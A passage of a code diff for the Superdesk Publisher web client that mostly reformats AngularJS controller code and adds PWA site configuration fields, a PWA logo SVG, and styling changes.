+ };
}
changeRedirectFilter(type) {
@@ -492,20 +490,21 @@ export function WebPublisherSettingsController(
}
saveRedirect() {
- let updatedKeys = this._updatedKeys($scope.newRedirect, this.selectedRedirect);
+ let updatedKeys = this._updatedKeys(
+ $scope.newRedirect,
+ this.selectedRedirect
+ );
let newRedirect = _.pick($scope.newRedirect, updatedKeys);
delete newRedirect.kind;
publisher
- .manageRedirect(
- newRedirect,
- this.selectedRedirect.id
- )
- .then(r => {
+ .manageRedirect(newRedirect, this.selectedRedirect.id)
+ .then((r) => {
this.toggleCreateRedirect(false);
this.loadRedirects(true);
- }).catch(err => {
+ })
+ .catch((err) => {
let message = err.data.message
? err.data.message
: "Something went wrong. Try again.";
@@ -516,7 +515,7 @@ export function WebPublisherSettingsController(
editRedirect(redirect) {
let editedRedirect = {
permanent: redirect.permanent ? "true" : "false",
- id: redirect.id
+ id: redirect.id,
};
if (redirect.route_target && redirect.route_source) {
@@ -540,11 +539,13 @@ export function WebPublisherSettingsController(
.confirm(gettext("Please confirm you want to delete redirect."))
.then(() =>
publisher.removeRedirect(id).then(() => {
- let index = $scope.redirects.items.findIndex(redirect => redirect.id === id);
+ let index = $scope.redirects.items.findIndex(
+ (redirect) => redirect.id === id
+ );
if (index !== -1) $scope.redirects.items.splice(index, 1);
})
)
- .catch(err => {
+ .catch((err) => {
let message = err.data.message
? err.data.message
: "Something went wrong. Try again.";
@@ -555,43 +556,47 @@ export function WebPublisherSettingsController(
loadRedirects(reset, limit) {
if (reset) $scope.redirects = { items: [], pages: 1 };
-
const page = !$scope.redirects.page ? 1 : $scope.redirects.page + 1;
const params = {
page: page,
limit: limit ? limit : 50,
- "sorting[createdAt]": "desc"
+ "sorting[createdAt]": "desc",
};
- if ((!reset && $scope.redirects.pages && page > $scope.redirects.pages) || $scope.redirects.loading) {
+ if (
+ (!reset && $scope.redirects.pages && page > $scope.redirects.pages) ||
+ $scope.redirects.loading
+ ) {
return;
}
$scope.redirects.loading = true;
- return publisher.queryRedirects(params).then(redirects => {
+ return publisher.queryRedirects(params).then((redirects) => {
let filteredRedirects = redirects._embedded._items;
if (this.redirectType === "route") {
filteredRedirects = filteredRedirects.filter(
- redirect => redirect.route_target && redirect.route_source
+ (redirect) => redirect.route_target && redirect.route_source
);
} else if (this.redirectType === "custom") {
filteredRedirects = filteredRedirects.filter(
- redirect => !redirect.route_target && !redirect.route_source
+ (redirect) => !redirect.route_target && !redirect.route_source
);
}
$scope.redirects.loading = false;
$scope.redirects.page = page;
$scope.redirects.pages = redirects.pages;
- $scope.redirects.items = [...$scope.redirects.items, ...filteredRedirects];
+ $scope.redirects.items = [
+ ...$scope.redirects.items,
+ ...filteredRedirects,
+ ];
return $scope.redirects.items;
});
}
-
// ---------------------------------- NAVIGATION
/**
@@ -644,11 +649,15 @@ export function WebPublisherSettingsController(
}
if ($scope.newMenu.route) {
- let route = $scope.routes.find(r => r.id === $scope.newMenu.route);
- if (route.type === 'custom') {
- let valueSlug = $scope.newMenu.variableValue.toLowerCase().replaceAll(" ", "-");
-
- $scope.newMenu.uri = valueSlug.length ? route.static_prefix + "/" + valueSlug : route.static_prefix;
+ let route = $scope.routes.find((r) => r.id === $scope.newMenu.route);
+ if (route.type === "custom") {
+ let valueSlug = $scope.newMenu.variableValue
+ .toLowerCase()
+ .replaceAll(" ", "-");
+
+ $scope.newMenu.uri = valueSlug.length
+ ? route.static_prefix + "/" + valueSlug
+ : route.static_prefix;
delete $scope.newMenu.route;
delete $scope.newMenu.variableValue;
}
@@ -686,7 +695,7 @@ export function WebPublisherSettingsController(
editMenuTree(menu) {
$scope.menu = menu;
$scope.menusInTree = this._flattenTree(menu);
- publisher.queryRoutes().then(routes => {
+ publisher.queryRoutes().then((routes) => {
$scope.routes = routes;
});
this.changeManageTab("navigation-menu");
@@ -728,14 +737,14 @@ export function WebPublisherSettingsController(
isRouteTypeCustom(routeId) {
if (!$scope.routes || !$scope.routes.length) return null;
- let route = $scope.routes.find(r => r.id === routeId);
- return route.type === 'custom';
+ let route = $scope.routes.find((r) => r.id === routeId);
+ return route.type === "custom";
}
getRouteNameById(routeId) {
if (!$scope.routes || !$scope.routes.length) return null;
- let route = $scope.routes.find(r => r.id === routeId);
+ let route = $scope.routes.find((r) => r.id === routeId);
return route.name;
}
@@ -761,7 +770,7 @@ export function WebPublisherSettingsController(
navigationMenuSetUri() {
if ($scope.newMenu.route) {
let route = $scope.routes.find(
- route => route.id === $scope.newMenu.route
+ (route) => route.id === $scope.newMenu.route
);
$scope.newMenu.uri = route.staticPrefix;
@@ -805,7 +814,7 @@ export function WebPublisherSettingsController(
.slice(0, index)
.concat(item)
.concat(list.children.slice(index))
- .filter(item => !item.removed);
+ .filter((item) => !item.removed);
let menuPosition = list.children.indexOf(item);
@@ -828,7 +837,7 @@ export function WebPublisherSettingsController(
*/
_refreshCurrentMenu() {
this.menuPaneOpen = false;
- publisher.getMenu($scope.menu.id).then(menu => {
+ publisher.getMenu($scope.menu.id).then((menu) => {
$scope.menu = menu;
$scope.menusInTree = this._flattenTree(menu);
});
@@ -844,7 +853,7 @@ export function WebPublisherSettingsController(
$scope.loading = true;
this.menuAdd = false;
this.menuPaneOpen = false;
- publisher.queryMenus().then(menus => {
+ publisher.queryMenus().then((menus) => {
$scope.loading = false;
$scope.menus = menus;
});
@@ -913,21 +922,29 @@ export function WebPublisherSettingsController(
let filteredNewSite = { ...$scope.newSite };
delete filteredNewSite.updated_at;
- if (filteredNewSite.apple_news_config === null) filteredNewSite.apple_news_config = { api_key_id: null, api_key_secret: null, channel_id: null };
+ if (filteredNewSite.apple_news_config === null)
+ filteredNewSite.apple_news_config = {
+ api_key_id: null,
+ api_key_secret: null,
+ channel_id: null,
+ };
let updatedKeys = this._updatedKeys(filteredNewSite, this.selectedSite);
this.loading = true;
publisher
- .manageSite(_.pick(filteredNewSite, updatedKeys), this.selectedSite.code)
- .then(site => {
+ .manageSite(
+ _.pick(filteredNewSite, updatedKeys),
+ this.selectedSite.code
+ )
+ .then((site) => {
this.siteForm.$setPristine();
this.selectedSite = site;
this.loading = false;
publisher.setTenant(site);
this._refreshSites();
})
- .catch(err => {
+ .catch((err) => {
$scope.newSite = angular.copy(this.selectedSite);
this.loading = false;
});
@@ -949,7 +966,7 @@ export function WebPublisherSettingsController(
publisher.setTenant();
this._refreshSites();
})
- .catch(err => {
+ .catch((err) => {
if (err.status === 409) {
modal
.confirm(
@@ -969,7 +986,11 @@ export function WebPublisherSettingsController(
}
switchAppleNewsConfig() {
- $scope.newSite.apple_news_config = $scope.newSite.apple_news_config === null || $scope.newSite.apple_news_config.channel_id === null ? { api_key_id: '', api_key_secret: '', channel_id: '' } : null;
+ $scope.newSite.apple_news_config =
+ $scope.newSite.apple_news_config === null ||
+ $scope.newSite.apple_news_config.channel_id === null
+ ? { api_key_id: "", api_key_secret: "", channel_id: "" }
+ : null;
this.siteForm.$setDirty();
}
@@ -1012,10 +1033,10 @@ export function WebPublisherSettingsController(
* @description Saving theme settings and logo
*/
saveThemeSettings() {
- let settingsToSave = _.map($scope.newThemeSettings.settings, value => {
+ let settingsToSave = _.map($scope.newThemeSettings.settings, (value) => {
return _.pick(value, ["name", "value"]);
});
- publisher.saveSettings({ bulk: settingsToSave }).then(settings => {
+ publisher.saveSettings({ bulk: settingsToSave }).then((settings) => {
this.themeSettingsForm.$setPristine();
});
}
@@ -1035,12 +1056,12 @@ export function WebPublisherSettingsController(
if (!logoFile.$error) {
publisher
.uploadThemeLogo({ logo: logoFile }, type)
- .then(response => {
+ .then((response) => {
this.themeSettings[type] = response.data;
let flagName = "replace_" + type;
this[flagName] = false;
})
- .catch(err => {
+ .catch((err) => {
$scope.newThemeSettings[type].error = true;
});
}
@@ -1058,7 +1079,7 @@ export function WebPublisherSettingsController(
$scope.newRule = {
type: type,
destinations: [],
- expressions: [{}]
+ expressions: [{}],
};
this.rulePaneOpen = type ? true : false;
@@ -1072,7 +1093,7 @@ export function WebPublisherSettingsController(
* @description gets tenant name by its code
*/
getTenantNameByCode(code) {
- let tenant = this.sites.find(site => {
+ let tenant = this.sites.find((site) => {
return site.code == code;
});
@@ -1086,7 +1107,7 @@ export function WebPublisherSettingsController(
* @description gets tenant name by its code
*/
getTenantOutputChannelNameByCode(code) {
- let tenant = this.sites.find(site => {
+ let tenant = this.sites.find((site) => {
return site.code == code;
});
@@ -1106,7 +1127,11 @@ export function WebPublisherSettingsController(
return site.code == code;
});
- return tenant ? tenant.subdomain + "." + tenant.domain_name : null;
+ return tenant
+ ? tenant.pwa_config && tenant.pwa_config.url
+ ? tenant.pwa_config.url
+ : tenant.subdomain + "." + tenant.domain_name
+ : null;
}
/**
@@ -1320,7 +1345,7 @@ export function WebPublisherSettingsController(
// organization rule
$scope.newRule.destinations = [];
- _.each($scope.newRule.configuration.destinations, destination => {
+ _.each($scope.newRule.configuration.destinations, (destination) => {
let tenant = this.sites.find(function (site) {
return site.code == destination.tenant;
});
@@ -1342,18 +1367,18 @@ export function WebPublisherSettingsController(
description: $scope.newRule.description,
priority: "1",
expression: "",
- configuration: []
+ configuration: [],
};
if ($scope.newRule.type == "organization") {
newRule.configuration.push({
key: "destinations",
- value: []
+ value: [],
});
- _.each($scope.newRule.destinations, destination => {
+ _.each($scope.newRule.destinations, (destination) => {
let configuration = {
- tenant: destination.code
+ tenant: destination.code,
};
newRule.configuration[0].value.push(configuration);
@@ -1365,7 +1390,7 @@ export function WebPublisherSettingsController(
if ($scope.newRule.action.route) {
newRule.configuration.push({
key: "route",
- value: $scope.newRule.action.route
+ value: $scope.newRule.action.route,
});
}
if ($scope.newRule.action.published) {
@@ -1414,10 +1439,7 @@ export function WebPublisherSettingsController(
}
});
}
- return _(newRule)
- .omitBy(_.isNil)
- .omitBy(_.isEmpty)
- .value();
+ return _(newRule).omitBy(_.isNil).omitBy(_.isEmpty).value();
}
/**
@@ -1436,7 +1458,7 @@ export function WebPublisherSettingsController(
_.pick(newRule, updatedKeys),
this.selectedRule.id
)
- .then(rule => {
+ .then((rule) => {
this.rulePaneOpen = false;
this.selectedRule = {};
this._refreshRules();
@@ -1445,7 +1467,7 @@ export function WebPublisherSettingsController(
publisher.setTenant($scope.newRule.action.tenant);
publisher
.manageTenantRule(_.pick(newRule, updatedKeys), this.selectedRule.id)
- .then(rule => {
+ .then((rule) => {
this.rulePaneOpen = false;
this.selectedRule = {};
this._refreshRules();
@@ -1472,7 +1494,7 @@ export function WebPublisherSettingsController(
sitesFilter(site) {
return $scope.newRule.destinations.find(
- destination => destination.code === site.code
+ (destination) => destination.code === site.code
)
? false
: true;
@@ -1498,7 +1520,7 @@ export function WebPublisherSettingsController(
_loadThemes() {
$scope.loading = true;
- return publisher.getOrganizationThemes().then(response => {
+ return publisher.getOrganizationThemes().then((response) => {
$scope.loading = false;
$scope.organizationThemes = response._embedded._items;
});
@@ -1514,11 +1536,11 @@ export function WebPublisherSettingsController(
$scope.loading = true;
return publisher
.querySites()
- .then(sites => {
+ .then((sites) => {
// assigning theme to site
- angular.forEach(sites, site => {
+ angular.forEach(sites, (site) => {
site.theme = $scope.organizationThemes.find(
- theme => site.theme_name == theme.name
+ (theme) => site.theme_name == theme.name
);
});
$scope.sites = sites;
@@ -1527,7 +1549,7 @@ export function WebPublisherSettingsController(
this.toggleInfoCarousel();
}
})
- .catch(err => {
+ .catch((err) => {
$scope.loading = false;
notify.error("Couldn't get list of tenants. Try again");
});
@@ -1540,22 +1562,22 @@ export function WebPublisherSettingsController(
* @description Loads theme settings
*/
_refreshThemeSettings() {
- return publisher.getThemeSettings().then(settings => {
+ return publisher.getThemeSettings().then((settings) => {
this.themeSettings = {};
this.themeSettings.theme_logo = _.find(settings, {
- name: "theme_logo"
+ name: "theme_logo",
});
this.themeSettings.theme_logo_second = _.find(settings, {
- name: "theme_logo_second"
+ name: "theme_logo_second",
});
this.themeSettings.theme_logo_third = _.find(settings, {
- name: "theme_logo_third"
+ name: "theme_logo_third",
});
- _.remove(settings, setting => {
+ _.remove(settings, (setting) => {
return setting.name.includes("theme_logo") ? true : false;
});
// little hack to make ng-select work properly
- this.themeSettings.settings = settings.map(setting => {
+ this.themeSettings.settings = settings.map((setting) => {
if (setting.options) {
setting.value = setting.value.toString();
}
@@ -1584,10 +1606,12 @@ export function WebPublisherSettingsController(
* @description Loads Organization Rules
*/
_loadOrganizationRules() {
- return publisher.queryOrganizationRules({ limit: 99999 }).then(rules => {
- this.organizationRules = rules;
- return rules;
- });
+ return publisher
+ .queryOrganizationRules({ limit: 99999 })
+ .then((rules) => {
+ this.organizationRules = rules;
+ return rules;
+ });
}
/**
@@ -1599,8 +1623,8 @@ export function WebPublisherSettingsController(
this.tenantsRules = {};
// tenants configured with organization rules
this.availableTenants = [];
- _.each(this.organizationRules, rule => {
- _.each(rule.configuration.destinations, dest => {
+ _.each(this.organizationRules, (rule) => {
+ _.each(rule.configuration.destinations, (dest) => {
let tenant = this.sites.find(function (site) {
return site.code == dest.tenant;
});
@@ -1608,7 +1632,7 @@ export function WebPublisherSettingsController(
if (tenant) {
publisher.setTenant(tenant);
this.availableTenants.push(tenant);
- this._loadTenantRules().then(rules => {
+ this._loadTenantRules().then((rules) => {
this.tenantsRules[tenant.code] = rules;
});
}
@@ -1622,16 +1646,16 @@ export function WebPublisherSettingsController(
* @description Loads Tenant Rules
*/
_loadTenantRules() {
- return publisher.queryTenantRules({ limit: 99999 }).then(rules => {
+ return publisher.queryTenantRules({ limit: 99999 }).then((rules) => {
return rules;
});
}
/**
- * @ngdoc method
- * @name WebPublisherSettingsController#_loadIngestSources
- * @description Loads ingest sources
- */
+ * @ngdoc method
+ * @name WebPublisherSettingsController#_loadIngestSources
+ * @description Loads ingest sources
+ */
_loadIngestSources = (page = 1) => {
api.ingestProviders
.query({ max_results: 200, page: page })
@@ -1639,12 +1663,10 @@ export function WebPublisherSettingsController(
let ingestSources = response._items;
if (ingestSources.length) {
- this.ingestSources = [...this.ingestSources, ...ingestSources]
+ this.ingestSources = [...this.ingestSources, ...ingestSources];
}
if (response._links.next) this._loadIngestSources(page + 1);
-
-
});
};
@@ -1658,18 +1680,24 @@ export function WebPublisherSettingsController(
this.expressionBuilder = {
operators: {
- string: [{ name: "=", value: "==" }, { name: "!=", value: "!=" }],
+ string: [
+ { name: "=", value: "==" },
+ { name: "!=", value: "!=" },
+ ],
number: [
{ name: "=", value: "==" },
{ name: "!=", value: "!=" },
{ name: "<", value: "<" },
{ name: ">", value: ">" },
{ name: "<=", value: "<=" },
- { name: ">=", value: ">=" }
+ { name: ">=", value: ">=" },
],
in: [{ name: "=", value: "in" }],
- custom: [{ name: "=", value: "==" }, { name: "!=", value: "!=" }]
- }
+ custom: [
+ { name: "=", value: "==" },
+ { name: "!=", value: "!=" },
+ ],
+ },
};
if ($scope.newRule.type == "organization") {
@@ -1680,10 +1708,10 @@ export function WebPublisherSettingsController(
{
name: "Ingest Source",
value: "package.getSource()",
- type: "string"
+ type: "string",
},
{ name: "Priority", value: "package.getPriority()", type: "number" },
- { name: "Urgency", value: "package.getUrgency()", type: "number" }
+ { name: "Urgency", value: "package.getUrgency()", type: "number" },
];
} else {
// article
@@ -1694,29 +1722,29 @@ export function WebPublisherSettingsController(
{
name: "Category",
value: "article.getPackage().getServicesNames()",
- type: "in"
+ type: "in",
},
{ name: "Author", value: "article.getAuthorsNames()", type: "in" },
{
name: "Ingest Source",
value: "article.getPackage().getSource()",
- type: "string"
+ type: "string",
},
{
name: "Priority",
value: "article.getPackage().getPriority()",
- type: "number"
+ type: "number",
},
{
name: "Urgency",
value: "article.getPackage().getUrgency()",
- type: "number"
- }
+ type: "number",
+ },
];
}
- vocabularies.getAllActiveVocabularies().then(result => {
- result.forEach(vocabulary => {
+ vocabularies.getAllActiveVocabularies().then((result) => {
+ result.forEach((vocabulary) => {
if (vocabulary._id === "categories") {
this.expressionBuilder.categories = vocabulary.items;
}
@@ -1725,7 +1753,7 @@ export function WebPublisherSettingsController(
name: vocabulary.display_name,
value:
customRuleFunctionName + "['" + vocabulary.display_name + "']",
- type: "custom"
+ type: "custom",
});
}
});
diff --git a/client/directives/siteWizard/SiteWizardDirective.js b/client/directives/siteWizard/SiteWizardDirective.js
index 3c483493..edab1da7 100644
--- a/client/directives/siteWizard/SiteWizardDirective.js
+++ b/client/directives/siteWizard/SiteWizardDirective.js
@@ -12,7 +12,7 @@ export function SiteWizardDirective(publisher, WizardHandler) {
this.scope = {
active: "=active",
managerController: "=managerController",
- outputChannelType: "=outputChannelType"
+ outputChannelType: "=outputChannelType",
};
this.template = require("./wizard.html");
}
@@ -28,18 +28,24 @@ export function SiteWizardDirective(publisher, WizardHandler) {
busy: false,
errorMessage: null,
site: null,
- ready: false
+ ready: false,
};
scope.newSite = {};
if (scope.outputChannelType) {
- scope.newSite.output_channel = {
- type: scope.output_channelType.toLowerCase(),
- config: {
+ if (scope.outputChannelType === "PWA") {
+ scope.newSite.pwa_config = {
url: "",
- authorization_key: ""
- }
- };
+ };
+ } else {
+ scope.newSite.output_channel = {
+ type: scope.outputChannelType.toLowerCase(),
+ config: {
+ url: "",
+ authorization_key: "",
+ },
+ };
+ }
}
};
@@ -69,7 +75,7 @@ export function SiteWizardDirective(publisher, WizardHandler) {
scope.wizard.busy = true;
let newUrl = scope.newSite.subdomain + "." + scope.newSite.domain_name;
- publisher.checkIfPublisher(newUrl).then(isPublisher => {
+ publisher.checkIfPublisher(newUrl).then((isPublisher) => {
if (!isPublisher) {
scope.wizard.busy = false;
scope.wizard.errorMessage =
@@ -79,7 +85,7 @@ export function SiteWizardDirective(publisher, WizardHandler) {
publisher
.manageSite(scope.newSite)
- .then(site => {
+ .then((site) => {
scope.wizard.errorMessage = false;
scope.wizard.site = site;
publisher.setTenant(site);
@@ -91,7 +97,7 @@ export function SiteWizardDirective(publisher, WizardHandler) {
WizardHandler.wizard("siteWizard").next();
}
})
- .catch(error => {
+ .catch((error) => {
scope.wizard.busy = false;
if (error.status === 409) {
scope.wizard.errorMessage = "Site already exists";
diff --git a/client/directives/siteWizard/wizard.html b/client/directives/siteWizard/wizard.html
index 19ebfe3d..2e787b1a 100644
--- a/client/directives/siteWizard/wizard.html
+++ b/client/directives/siteWizard/wizard.html
@@ -6,11 +6,8 @@
<h3 class="modal__heading" translate>
Create Site Wizard
<span ng-if="newSite.output_channel"
- >-
- {{
- newSite.output_channel.type.charAt(0).toUpperCase() +
- newSite.output_channel.type.slice(1)
- }}</span
+ >- {{ newSite.output_channel.type.charAt(0).toUpperCase() +
+ newSite.output_channel.type.slice(1) }}</span
>
</h3>
</div>
@@ -36,7 +33,10 @@ <h3 class="modal__heading" translate>
{{ wizard.errorMessage }}
</div>
<fieldset>
- <div ng-if="newSite.output_channel" class="form__row form__row--flex">
+ <div
+ ng-if="newSite.output_channel || newSite.pwa_config"
+ class="form__row form__row--flex"
+ >
<h4 class="text--light text--thin text--uppercase">
Superdesk Publisher tenant settings
</h4>
@@ -101,9 +101,9 @@ <h4 class="text--light text--thin text--uppercase">
>
<div class="form__row-item">
<div class="sd-line-input sd-line-input--required">
- <label class="sd-line-input__label" translate>{{
- name.replace("_", " ")
- }}</label>
+ <label class="sd-line-input__label" translate
+ >{{ name.replace("_", " ") }}</label
+ >
<input
class="sd-line-input__input"
type="text"
@@ -113,6 +113,30 @@ <h4 class="text--light text--thin text--uppercase">
</div>
</div>
</div>
+
+ <div ng-if="newSite.pwa_config" class="form__row form__row--flex">
+ <h4 class="text--light text--thin text--uppercase">PWA settings</h4>
+ </div>
+ <div
+ class="form__row form__row--flex"
+ ng-if="newSite.pwa_config"
+ ng-repeat="(name, value) in newSite.pwa_config"
+ >
+ <div class="form__row-item">
+ <div class="sd-line-input sd-line-input--required">
+ <label class="sd-line-input__label" translate
+ >{{ name.replace("_", " ") }}</label
+ >
+ <input
+ class="sd-line-input__input"
+ type="text"
+ ng-model="newSite.pwa_config[name]"
+ placeholder="{{name === 'url' ? 'https://website.com' : null}}"
+ required
+ />
+ </div>
+ </div>
+ </div>
</fieldset>
</form>
@@ -157,7 +181,7 @@ <h4 class="text--light text--thin text--uppercase">
Configure your site
</button>
<button
- class="btn btn--hollow btn--primary"
+ class="btn btn--hollow btn--primary"
ng-disabled="!wizard.ready"
ng-click="managerController.toggleSiteWizard()"
>
diff --git a/client/images/PWA_logo.svg b/client/images/PWA_logo.svg
new file mode 100644
index 00000000..d931c172
--- /dev/null
+++ b/client/images/PWA_logo.svg
@@ -0,0 +1,13 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg width="100%" height="100%" viewBox="0 0 978 388" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve" xmlns:serif="http://www.serif.com/" style="fill-rule:evenodd;clip-rule:evenodd;stroke-linejoin:round;stroke-miterlimit:2;">
+ <g transform="matrix(7.83465,0,0,7.83465,-398.586,-488.321)">
+ <path d="M142.662,103.442L146.265,94.331L156.668,94.331L151.73,80.51L157.905,64.896L175.59,111.852L162.548,111.852L159.526,103.442L142.662,103.442Z" style="fill-opacity:0.91;fill-rule:nonzero;"/>
+ </g>
+ <g transform="matrix(7.83465,0,0,7.83465,-398.586,-488.321)">
+ <path d="M131.535,109.284L150.467,62.328L137.916,62.329L124.965,92.673L115.755,62.329L106.108,62.329L96.22,92.673L89.246,78.845L82.935,98.288L89.343,109.284L101.695,109.284L110.631,82.072L119.15,109.284L131.535,109.284Z" style="fill-opacity:0.91;fill-rule:nonzero;" fill="#3d8fb1"/>
+ </g>
+ <g transform="matrix(7.83465,0,0,7.83465,-398.586,-488.321)">
+ <path d="M62.789,93.166L70.52,93.166C72.862,93.166 74.947,92.905 76.776,92.382L78.775,86.223L84.363,69.007C83.938,68.333 83.452,67.694 82.905,67.093C80.036,63.917 75.838,62.33 70.312,62.33L50.875,62.33L50.875,109.286L62.789,109.286L62.789,93.166ZM73.022,73.132C74.143,74.26 74.703,75.77 74.703,77.66C74.703,79.566 74.21,81.077 73.225,82.194C72.144,83.435 70.155,84.056 67.257,84.056L62.789,84.056L62.789,71.441L67.29,71.441C69.991,71.441 71.902,72.004 73.022,73.132Z" style="fill-opacity:0.91;fill-rule:nonzero;"/>
+ </g>
+</svg>
diff --git a/client/styles/_publisher.scss b/client/styles/_publisher.scss
index 2ed6803b..78639e0c 100644
--- a/client/styles/_publisher.scss
+++ b/client/styles/_publisher.scss
@@ -23,10 +23,10 @@
.modal--kindafullscreen {
position: fixed;
- left: 48px;
- right: 0px;
- top: 49px;
- bottom: 32px;
+ left: 50px !important;
+ right: 0px !important;
+ top: 40px !important;
+ bottom: 25px !important;
align-items: flex-start;
flex-direction: column;
overflow: hidden;
@@ -35,15 +35,15 @@
}
.modal--kindafullscreen .modal__dialog {
- width: 100%;
- height: 100%;
- max-width: 100%;
+ width: 100% !important;
+ height: 100% !important;
+ max-width: 100% !important;
}
.modal--kindafullscreen .modal__content {
margin: 0;
}
.modal--kindafullscreen .modal__content .modal__body {
- max-width: 100%;
+ max-width: 100% !important;
}
.listLimitNotification {
diff --git a/client/styles/articlePreview.scss b/client/styles/articlePreview.scss
index 46e7a39a..3570d186 100644
--- a/client/styles/articlePreview.scss
+++ b/client/styles/articlePreview.scss
@@ -1,95 +1,129 @@
.articlePreview {
- display: flex;
-
- &__iframe {
- margin: auto;
- width: 100%;
- height: calc(100vh - 88px);
- background-color: $white;
- border: 1px solid #e0e0e0;
- box-shadow: 0 0 12px rgba(0,0,0,0.1);
-
- &--tablet {
- width: 768px;
- height: 1024px;
- }
-
- &--tabletLandscape {
- width: 1024px;
- height: 768px;
- }
-
- &--mobile {
- width: 320px;
- height: 640px;
- }
-
- &--mobileLandscape {
- width: 640px;
- height: 320px;
- }
- }
-}
+ display: flex;
-.previewIcon {
- display: inline-block;
- background-position: bottom center;
- background-repeat: no-repeat;
- height: 32px;
- width: 32px;
- opacity: 0.25;
-
- &--desktop {
- background-image: url(../images/icon-desktop.svg);
- }
+ &__iframe {
+ margin: auto;
+ width: 100%;
+ height: calc(100vh - 88px);
+ background-color: $white;
+ border: 1px solid #e0e0e0;
+ box-shadow: 0 0 12px rgba(0, 0, 0, 0.1);
&--tablet {
- background-image: url(../images/icon-tablet.svg);
- width: 26px;
- margin-left: 15px;
+ width: 768px;
+ height: 1024px;
}
&--tabletLandscape {
- background-image: url(../images/icon-tablet-lands.svg);
+ width: 1024px;
+ height: 768px;
}
&--mobile {
- background-image: url(../images/icon-mobile.svg);
- width: 16px;
- margin-left: 10px;
+ width: 320px;
+ height: 640px;
}
&--mobileLandscape {
- background-image: url(../images/icon-mobile-lands.svg);
+ width: 640px;
+ height: 320px;
}
+ }
+}
- &--amp {
- background-image: url(../images/icon-amp-port.svg);
- margin-left: 10px;
- }
+.previewIcon {
+ display: inline-block;
+ background-position: bottom center;
+ background-repeat: no-repeat;
+ height: 32px;
+ width: 32px;
+ opacity: 0.25;
- &--ampLandscape {
- background-image: url(../images/icon-amp-land.svg);
- }
+ &--desktop {
+ background-image: url(../images/icon-desktop.svg);
+ }
- &--active {
- opacity: 0.8;
- }
+ &--tablet {
+ background-image: url(../images/icon-tablet.svg);
+ width: 26px;
+ margin-left: 15px;
+ }
+
+ &--tabletLandscape {
+ background-image: url(../images/icon-tablet-lands.svg);
+ }
+
+ &--mobile {
+ background-image: url(../images/icon-mobile.svg);
+ width: 16px;
+ margin-left: 10px;
+ }
+
+ &--mobileLandscape {
+ background-image: url(../images/icon-mobile-lands.svg);
+ }
+
+ &--amp {
+ background-image: url(../images/icon-amp-port.svg);
+ margin-left: 10px;
+ }
+
+ &--ampLandscape {
+ background-image: url(../images/icon-amp-land.svg);
+ }
+
+ &--active {
+ opacity: 0.8;
+ }
}
// Font size fix
.side-panel__content-block-text p {
- font-size: 1.5rem;
- line-height: 140%;
- font-weight: 300;
- word-wrap: break-word;
- padding-bottom: 1rem;
+ font-size: 1.5rem;
+ line-height: 140%;
+ font-weight: 300;
+ word-wrap: break-word;
+ padding-bottom: 1rem;
}
// Side panel embed width
.side-panel__content-block {
- .embed-block {
- iframe {
- width: 100%;
- }
+ .embed-block {
+ iframe {
+ width: 100%;
+ }
+ }
+}
+
+// typography stuff in preview pane
+.side-panel__content-block-text {
+ ul {
+ list-style-type: revert;
+ margin: revert;
+ padding: revert;
+ }
+
+ blockquote {
+ font-size: 14px;
+ line-height: 140%;
+ margin: 16px 0;
+ border-left: 3px solid rgba(160, 160, 160, 0.5);
+ padding: 4px 0 4px 14px;
+ font-style: italic;
+ }
+
+ table {
+ width: 100%;
+ border-collapse: collapse;
+ resize: both;
+ table-layout: auto;
+ border: 1px solid #dadada;
+ margin: 16px 0;
+
+ td {
+ border: 1px solid #dadada;
+ padding: 5px 8px;
+ font-size: 14px;
+ font-weight: 300;
}
+ }
}
diff --git a/client/styles/helperElements.scss b/client/styles/helperElements.scss
index f73f5dea..d9dfd0a3 100644
--- a/client/styles/helperElements.scss
+++ b/client/styles/helperElements.scss
@@ -8,6 +8,15 @@
no-repeat;
}
+.sp-logo-pwa {
+ display: block;
+ float: right;
+ margin-right: 1rem;
+ width: 50px;
+ height: 30px;
+ background: transparent url(../images/PWA_logo.svg) center center no-repeat;
+}
+
.absPosition {
position: absolute;
diff --git a/client/views/settings/website-management/manage-general.html b/client/views/settings/website-management/manage-general.html
index 277f2d27..759cb3cc 100644
--- a/client/views/settings/website-management/manage-general.html
+++ b/client/views/settings/website-management/manage-general.html
@@ -46,8 +46,7 @@
class="dropdown__toggle line-input"
ng-model="newSite.default_language"
ng-options="lang.qcode as lang.name for lang in webPublisherSettings.languages"
- >
- </select>
+ ></select>
</div>
</div>
<div class="form__row">
@@ -139,5 +138,26 @@ <h4 class="text--light text--uppercase">
</div>
</div>
</div>
+ <div ng-if="newSite.pwa_config && newSite.pwa_config.url">
+ <div class="form__row">
+ <h4 class="text--light text--uppercase">PWA settings</h4>
+ </div>
+ <div class="form__row" ng-repeat="(name, value) in newSite.pwa_config">
+ <div class="form__row-item">
+ <div class="sd-line-input sd-line-input--required">
+ <label class="sd-line-input__label" translate
+ >{{name.replace('_', ' ')}}</label
+ >
+ <input
+ class="sd-line-input__input"
+ type="text"
+ ng-model="newSite.pwa_config[name]"
+ placeholder="{{name === 'url' ? 'https://website.com' : null}}"
+ required
+ />
+ </div>
+ </div>
+ </div>
+ </div>
</form>
</div>
diff --git a/client/views/settings/website-management/manage.html b/client/views/settings/website-management/manage.html
index 832a0988..c47c710c 100644
--- a/client/views/settings/website-management/manage.html
+++ b/client/views/settings/website-management/manage.html
@@ -11,7 +11,7 @@ <h3 class="subnav__page-title">{{webPublisherSettings.selectedSite.name}}</h3>
<a
class="btn btn--text-only"
target="_blank"
- ng-href="{{webPublisherSettings.selectedSite.subdomain ? 'http://' + webPublisherSettings.selectedSite.subdomain + '.' + webPublisherSettings.selectedSite.domain_name: 'http://' + webPublisherSettings.selectedSite.domain_name}}"
+ ng-href="{{webPublisherSettings.selectedSite.pwa_config && webPublisherSettings.selectedSite.pwa_config.url ? webPublisherSettings.selectedSite.pwa_config.url : webPublisherSettings.selectedSite.subdomain ? 'http://' + webPublisherSettings.selectedSite.subdomain + '.' + webPublisherSettings.selectedSite.domain_name: 'http://' + webPublisherSettings.selectedSite.domain_name}}"
>
<i class="icon-globe"></i> Open website
</a>
diff --git a/client/views/settings/website-management/partials/routes-tree.html b/client/views/settings/website-management/partials/routes-tree.html
index 15b1a6f1..f162a269 100644
--- a/client/views/settings/website-management/partials/routes-tree.html
